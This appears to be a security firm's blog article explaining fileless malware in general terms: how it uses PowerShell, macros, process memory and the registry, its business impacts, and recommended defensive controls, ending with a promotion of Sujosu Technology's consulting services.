Fileless malware is a type of malicious software that works directly within a computer’s memory instead of the hard disk. It is termed “fileless” because when a machine gets infected, no files are downloaded to the hard disk. It uses legitimate programs to infect a computer, often bypassing user and endpoint defenses.
Fileless malware can infect computers using various techniques. It can use PowerShell to access the built-in Windows API functions that would normally be used in malicious executable file. A Microsoft Office document may include malicious macros that use PowerShell to execute commands. These macros may be used to download and execute additional malware without writing it to the hard disk. Attackers can exploit vulnerabilities within applications to execute malicious commands without writing anything to the hard disk. Malware can also write code to the memory space of an existing process and launch its malicious functionality within that process. Besides, attackers can manipulate the Windows registry and use a malicious link or file that takes advantage of a trusted Windows process. If a user clicks on that link, the Windows process will write and execute fileless malware into the registry.
As per The Ponemon Institute’s report, fileless malware attacks are 10 times more likely to succeed than traditional file-based attacks. The 2023 Cloud Native Threat Report by Aqua Security stated that fileless attacks increased more than 1400% as compared to the previous year.
Impact
Organizations may suffer from downtime and loss of productivity.
Fileless malware can cause data breaches and theft of intellectual property. These can result in significant financial losses for the affected organization.
Fileless malware attacks may damage an organization’s brand image, leading to loss of customer base.
Breach of sensitive data may cause organizations to face litigations.
Controls
Organizations should implement a comprehensive security policy.
Software should be procured / downloaded only from trusted sources.
Latest security patches and updates should be installed in all system and application software.
Anti-malware should be installed and updated at regular intervals.
Proper identity and access management must be implemented for critical resources. Access should only be granted on a need-to-know and need-to-use basis. Zero-trust security may be implemented.
Critical data and resources should be securely backed-up at regular intervals.
Periodic security assessments and audits should be conducted to detect and remove vulnerabilities in systems.
Users should be provided with continuous training on how to identify and mitigate fileless malware.
How Sujosu Can Help
Sujosu Technology can help you identify areas of concern and assess your application and infrastructure security risk. Our consultants can suggest appropriate countermeasures and provide awareness / training to prevent, detect, identify, and recover from security attacks. Engage with us and remain cyber-secure.
Comments